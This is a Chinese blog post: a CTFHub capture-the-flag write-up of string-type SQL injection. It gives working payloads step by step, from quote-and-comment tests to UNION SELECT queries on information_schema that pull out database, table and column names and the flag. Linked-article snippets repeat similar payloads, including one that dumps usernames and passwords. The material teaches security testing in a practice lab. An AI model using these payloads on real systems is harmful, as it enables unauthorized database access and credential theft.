【SQL注入】字符型注入

最新推荐文章于 2025-09-26 14:56:42 发布

原创最新推荐文章于 2025-09-26 14:56:42 发布 · 637 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql

CTFHUB 字符型SQL注入
在这里插入图片描述

在这里插入图片描述

只能查询得到id为1和2的回显，且注意查询语句select * from news where id='1',与数字型SQL查询不同的是所查询的是一个用单引号括起来的字符

验证输入

1‘#

在这里插入图片描述
雀氏嗷，对比数字型注入中说到的，判断此题为字符型注入
先判断能否注入，即注入的代码能否执行

1' and 1=1 #

1' and 1=2 #

在这里插入图片描述
存在注入

hi' union select 1,database()#

在这里插入图片描述
因为是字符型注入，可以整点花活:)
原理是一样的，不存在id='hi'判断为假
得到数据库名“sqli”

hi' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

在这里插入图片描述爆出表名为“flag”和“nwes”

继续注入

singleDOG' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

在这里插入图片描述得到列名为flag

最后注入查询该列内容获得flag

imNOOB' union select 1,group_concat(flag) from sqli.flag#

在这里插入图片描述
解完，下班！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

noob_3000

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

SQL注入详解

渗透之路，攻防之间皆学问

05-05

26万+

SQL注入（SQL Injection）是一种常见的Web安全漏洞，主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。从而导致数据库受损（被脱库、被删除、甚至整个服务器权限陷）。即：注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...

SQL注入—字符型注入（GET）

Ethan024的博客

03-22

668

SQL注入—数值型注入（GET）（本文仅供学习或参考）实验准备：皮卡丘靶场—SQL Injection—数值型注入（GET）实验步骤：当输入一个数据库里存在的用户名时候，会出现相关邮箱和id：当输入一个不存在的字符串时，没有任何信息：查看其URL，发现请求实在URL中提交的，是一个GET请求： http://localhost/pikaqiu.cn/vul/sqli/sqli_str.php?name=1111&submit=%E6%9F%A5%E8%AF%A2

参与评论您还未登录，请先登录后发表或查看评论

SQL注入字符型注入

qq_64332865的博客

02-17

836

访问sqli-labs网站用火狐浏览器http://ip/sqli-Labs/Less-2/，登陆后先顶一个GET参数，再网址后边加上?id=1 显示用户名密码为Dumb 可以使用火狐浏览器带的hackbar工具，可以用来调整参数寻找注入点分别使用三条payload寻找注入点和判断注入类型在原来的网址后加上?id=1’ 运行后报错然后再换成?id=1 and 1=1 然后就运行正常再把1=1换成1=2，再显示结果没...

黑客学习-sql注入-字符型

weixin_49349476的博客

11-24

1678

判断sql漏洞的类型为字符型，利用post手工注入获数据库信息，在利用busp进行注入，最终获取账号和密码

SQL 三种注入方式，一文详解！

最新发布

Cairo_A的博客

09-26

1210

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。

渗透测试 | SQL注入字符注入详解

yu_19980401的博客

11-17

2212

SQL注入详解 SQL注入的概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。字符注入后台语句模板 SELECT first_name,last_name FROM users WHERE user_id = ‘$id’; 正常访问 SELECT first_name,last_name FROM users WHERE user_id = ‘1’; 构造SQL注入语句 SELECT firs_name,last_name FROM user

③基于字符型的SQL注入

熊俊坤的博客

10-24

1万+

基于字符型的SQL注入

SQL 字符型注入

MZa1213123的博客

03-02

4700

CTFHub SQL 字符型注入可以看到我们输入的数据会被单引号所括上尝试正常的 1 and 1=2 发现没有报错还是有回显 字符型的 1 and 1=2 就相当于只是字符串并没有发挥其表达式的作用所以这就没有产生错误回显（不太明白为什么 sql 还是会查询到id = 1 的数据）这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试整个的 sql 语句大概是 $ sql = "select Data from table_name .

【ctfhub】SQL注入字符型注入

manerzi的博客

10-05

493

SQL注入字符型注入

2.SQL注入-字符型

愿听风成曲

06-29

284

通过前端输入条件，传参到后端数据库的配置文件逻辑。在数据库中查询对应的kobe，根据上图对应上。编写payload语句，添加or 1=1#如图所示，所有用户信息展示出来。输入kobe查询出现id和邮箱。在搜索框中输入语句为。

简单的SQL字符型注入

qq_1182418846的博客

07-12

1371

输入：-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+输入：-1' union select 1,2,group_concat(username,'-',password) from users --+可以输入：1' and 1=2 union select 1,2,3--+ 或者-1' union select 1,2,3--+

SQL注入——字符型注入和无列名注入实例（超详细，小白也能学得会）

m0_69151365的博客

01-28

2553

在这一关中，我们首先判断了sql注入类型，发现是字符型注入，我们先是利用order by 来确定该表中的列数，有了列数我们就可以通过database（）函数获取到该网站所在的库，我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables表中查询到了该库中的所有表，又在columns表通过过滤table_name和table_schema两个字段查找出users表中的列（字段）信息，到这一步之后我们就直接在users表中查找用户和密码，此时注入完成。

SQL注入攻击及其解决方案--替换特殊字符.rar

09-02

SQL注入攻击及其解决方案--替换特殊字符.rar

N7-SQL注入（字符型）

尐猴子君ii的博客

03-31

1049

今天要和大家分享的，是SQL注入的字符型部分。原理很简单，依然是依靠创造SQL语句的闭合，来实现将所有的数据全部copy出来。首先打开pikachu测试平台的SQL-inject的字符型注入（get）章节。首先尝试输入一个错误的名字，发现返回不存在。然后可以输入一下正确的名字，可以看出，返回了正确名字的id等信息。我们可以尝试以下数字型的 1 or 1=1’;#的语句，发现返回用户名...

SQL注入原理-字符型注入